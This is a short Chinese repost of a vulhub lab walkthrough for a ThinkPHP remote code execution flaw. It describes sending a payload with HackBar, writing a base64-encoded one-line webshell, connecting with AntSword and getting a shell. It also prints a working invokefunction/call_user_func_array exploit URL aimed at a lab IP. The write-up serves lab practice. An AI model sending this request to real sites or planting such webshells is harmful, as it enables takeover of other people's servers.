脚本宝典收集整理的这篇文章主要介绍了thinkphp框架漏洞,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
进入vulhub靶场,启动环境。访问http://ip:8080测试靶场是否正常启动
使用hcakbar工具,构造payload,构造完毕后点击Execute
命令执行成功使用phpinfo验证漏洞
写入一句话木马,一句话木马要进行base64编码
进入容器,查看木马文件是否写入
然后使用蚁剑连接
成功getshell
进入vulhub靶场。启动环境
http://192.168.116.166:8080/index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&VARs[0]=phpinfo&vars[1][]=-1
代码执行成功说明存在远程代码执行漏洞
待更新
以上是脚本宝典为你收集整理的thinkphp框架漏洞全部内容,希望文章能够帮你解决thinkphp框架漏洞所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。